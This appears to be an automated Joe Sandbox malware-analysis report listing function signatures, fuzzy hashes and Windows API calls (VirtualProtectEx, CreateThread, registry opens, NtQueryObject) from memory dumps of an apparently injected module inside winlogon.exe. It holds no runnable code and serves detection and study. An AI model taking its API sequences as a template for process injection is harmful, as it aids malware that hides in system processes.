                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: e54ed8d5981410d2d10d562d395602567931b9c6313d0845cabb15234d5347af
                                                          • Instruction ID: f6bc3099d3021d90f66284fc7764e0d02526fbd7d5bff5af9890d681d6bf729d
                                                          • Opcode Fuzzy Hash: e54ed8d5981410d2d10d562d395602567931b9c6313d0845cabb15234d5347af
                                                          • Instruction Fuzzy Hash: B802EA3621DB9496E7A0CB99F49435AB7A0F3C5795F108056EA8E87BA8DF7DC484CF00

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID:
                                                          • API String ID: 1092925422-0
                                                          • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction ID: 5ab4cc4c86de14b28b7657dd2b04d766b10610f425967c1e4ffea0a6bb593b99
                                                          • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction Fuzzy Hash: B511422A619B50A3EB649B69E40821E77B0FB44B81F148036DE4E03794EB7DC954C784
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000003.1989875649.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_3_225dc610000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Protect$AllocLibraryLoad
                                                          • String ID:
                                                          • API String ID: 3316853933-0
                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction ID: 7c9ff1a1260ec0b76c18c2d9cc77086b54c9427e4fe21390ef94f9dc999a9e53
                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction Fuzzy Hash: 399126BAB02E6097EF648F69D409B6DB391F754FABF54C1349E4A07788DA38D812C700

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Virtual$AllocQuery
                                                          • String ID:
                                                          • API String ID: 31662377-0
                                                          • Opcode ID: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                                          • Instruction ID: bf1d2617ca0dc1213d6708b6b1205c297df0a859e96066834d8f5fc5efb5be15
                                                          • Opcode Fuzzy Hash: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                                          • Instruction Fuzzy Hash: BD314F2621DE90A1EA30DBADE45932B72A4F389789F108565E6CF07B98DF3CC180CB04

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32 ref: 00000225DC643A35
                                                          • PathFindFileNameW.SHLWAPI ref: 00000225DC643A44
                                                            • Part of subcall function 00000225DC643F88: StrCmpNIW.SHLWAPI(?,?,?,00000225DC64272F), ref: 00000225DC643FA0
                                                            • Part of subcall function 00000225DC643EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643EDB
                                                            • Part of subcall function 00000225DC643EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643F0E
                                                            • Part of subcall function 00000225DC643EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643F2E
                                                            • Part of subcall function 00000225DC643EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643F47
                                                            • Part of subcall function 00000225DC643EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643F68
                                                          • CreateThread.KERNELBASE ref: 00000225DC643A8B
                                                            • Part of subcall function 00000225DC641E74: GetCurrentThread.KERNEL32 ref: 00000225DC641E7F
                                                            • Part of subcall function 00000225DC641E74: CreateThread.KERNELBASE ref: 00000225DC642043
                                                            • Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC642049
                                                            • Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC642055
                                                            • Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC642061
                                                            • Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC64206D
                                                            • Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC642079
                                                            • Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC642085
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                          • String ID:
                                                          • API String ID: 2779030803-0
                                                          • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                          • Instruction ID: 130d4905f5eea26d9371d1b1ff51420db667a30803bfba8bb2bd091ed1f53f6f
                                                          • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                          • Instruction Fuzzy Hash: F611B13D66CE29B2FB60ABEDE54D7AD3290AB84B47F50C0B99507811D0EF3DC484C600

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                          • String ID:
                                                          • API String ID: 3733156554-0
                                                          • Opcode ID: b3b9d40e5005b69779f21a3a3f4c2159e48617e69c58b355d88cafa2766b084c
                                                          • Instruction ID: d45715ff951a902dcb5778469b34ec2c1c793993c87c33ab114304a363d5f69f
                                                          • Opcode Fuzzy Hash: b3b9d40e5005b69779f21a3a3f4c2159e48617e69c58b355d88cafa2766b084c
                                                          • Instruction Fuzzy Hash: 8DF0173A22DE5491D6309B99E45935A77A1E388BD5F148151FA8E47B69DA38C680CF00

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00000225DC641724: GetProcessHeap.KERNEL32 ref: 00000225DC64172F
                                                            • Part of subcall function 00000225DC641724: HeapAlloc.KERNEL32 ref: 00000225DC64173E
                                                            • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC6417AE
                                                            • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC6417DB
                                                            • Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC6417F5
                                                            • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC641815
                                                            • Part of subcall function 00000225DC641724: RegCloseKey.KERNELBASE ref: 00000225DC641830
                                                            • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC641850
                                                            • Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC64186B
                                                            • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC64188B
                                                            • Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC6418A6
                                                            • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC6418C6
                                                          • SleepEx.KERNELBASE ref: 00000225DC641BDF
                                                            • Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC6418E1
                                                            • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC641901
                                                            • Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC64191C
                                                            • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC64193C
                                                            • Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC641957
                                                            • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC641977
                                                            • Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC641992
                                                            • Part of subcall function 00000225DC641724: RegCloseKey.KERNELBASE ref: 00000225DC64199C
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$Heap$AllocProcessSleep
                                                          • String ID:
                                                          • API String ID: 948135145-0
                                                          • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                          • Instruction ID: 12f4e7bf2d043a765a3ac4f019d2c82d455fc7f3fa1118b40d32223ae48c856c
                                                          • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                          • Instruction Fuzzy Hash: 363135AD32CE61A1FB549BAED9583A933A4EB44BC6F04D4A18E0B973D5DF38C850C214

                                                          Control-flow Graph (graph data omitted): single basic block 225dc64f370-225dc64f39f calling VirtualProtect.
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction ID: 91454ba34573355ff24e871c1f84efd327f9d9e1a896de9ceab491d5d3354271
                                                          • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction Fuzzy Hash: 4CD01229735950D3E300DF61D8497966328F39C702FD08005E98A82694DF7CC259CB50

                                                          Control-flow Graph (graph data omitted): single basic block 225dc67f370-225dc67f39f calling VirtualProtect.
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction ID: a9a0868b07df84503d79fe2f89049b18ceebf10007afb1c3b1b6b2ac5b3c783d
                                                          • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction Fuzzy Hash: 91D01229731950D3F300DF51D8497956328F79C702FD08005E94AC6694DF7CC259CB51

                                                          Control-flow Graph (graph data omitted): single basic block 225dc6af370-225dc6af39f calling VirtualProtect.
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction ID: 7ad5aa38df14319b72f9190a8d26a325408e50eb3bc4bc849056c1e3cb0de339
                                                          • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction Fuzzy Hash: 27D01229731950D3E300DF51D8497D56329F3AC702FC08005E94AC2694DF7CC259CB50
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: AllocHeap
                                                          • String ID:
                                                          • API String ID: 4292702814-0
                                                          • Opcode ID: 065a3c227d1033dd624f9406cc348b017554f0f94b7651207c823ad3d34cd8d2
                                                          • Instruction ID: 8c995a941c99dfe8ec91a527983bcfb77f5d6b3f54302bc86fbf6d4b88a72ef6
                                                          • Opcode Fuzzy Hash: 065a3c227d1033dd624f9406cc348b017554f0f94b7651207c823ad3d34cd8d2
                                                          • Instruction Fuzzy Hash: D1F0B42C306E20B1FF9597ED580C3A412905F99B42F1CDC308E1A8ABC5ED3CC58AC211
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction ID: 434cbdb0f9c44be8f859e6a92bb332e08f0fb24b8a9ab8c877c5839079a85e8b
                                                          • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction Fuzzy Hash: 21B1B27A22CEA8A2EB599FADD408799B3A5F744F86F10D066EE0A53794DF35CC40C340
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction ID: 6e2edb3a058edf7ed16c8ea7a48cfc632efee82860856a5fe71e9e4b8278a0fc
                                                          • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction Fuzzy Hash: 8FB19D7A214EB0A6EB648FADD448799A3A4FB44F96F609426EE0957FD4DF35CC40C340
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction ID: fa57540a22b82042d2a169ee5b25633e73edf16a6416a5946321ed9c7ec9782f
                                                          • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction Fuzzy Hash: 27B1A06A214EA0A2EB64CFAED5087A9B7A5F744F86F64D026EE09D3794DF35CD40C340
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction ID: c02b42a4faf89e14a8460b6a51616ff0cfb1c70cf6853425f447978ae3c739dd
                                                          • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction Fuzzy Hash: 87318476219F90D6EB608FA4E8483EE7364F788749F54812ADB4E47B98EF38C548C710
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction ID: 4afa8d38674c89ef982d105566d5090484a901952933452247f4b34a58aa3c0c
                                                          • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction Fuzzy Hash: 4A317076204F9096EB60CFA4E8543EE7360F788749F44852ADB4D57B98EF78C548C710
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction ID: abab5ad0d1cbc909871ffb4861a123a704d0a8af35f60ddf638a1379e32f25b9
                                                          • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction Fuzzy Hash: 4E31827A205F909AEB60CFA4E8443ED7365F78874AF44812ADB4E47B98EF38C548C710
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction ID: 8fa4bbfcba876e14dacda529e4a851805128c227666f69b824544af283890819
                                                          • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction Fuzzy Hash: BD41743A218F90E6DB60CF69E84839E73A4F788755F604215EB9D47B98EF38C555CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
